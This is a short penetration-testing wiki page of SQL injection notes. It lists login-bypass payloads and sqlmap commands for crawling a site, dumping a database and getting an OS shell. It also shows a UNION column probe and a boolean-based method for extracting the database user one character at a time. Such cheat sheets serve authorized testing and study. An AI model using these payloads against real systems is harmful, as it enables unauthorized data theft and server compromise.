Skip to content

SQL Injection General Notes

Jump to bottom
TheGetch edited this page May 14, 2021 · 1 revision

SQL Injection General Notes

SQL Injection General Notes

Testing for Bypasses:

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

SQLMAP

sqlmap crawl

sqlmap -u http://172.21.0.0 --crawl=1

sqlmap dump database

sqlmap -u http://172.21.0.0 --dbms=mysql --dump

sqlmap shell

sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell

SQLi

Testing for a row:

http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8

Boolean Based SQLi

substring() returns a substring of the given argument. It takes three parameters: the input string, the position of the substring and its length.

  • or substr(user(), 1, 1) = 'a -> if true, move onto then letter:
  • or substr(user(), 2, 1) = 'b

Continue until username is revealed.

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally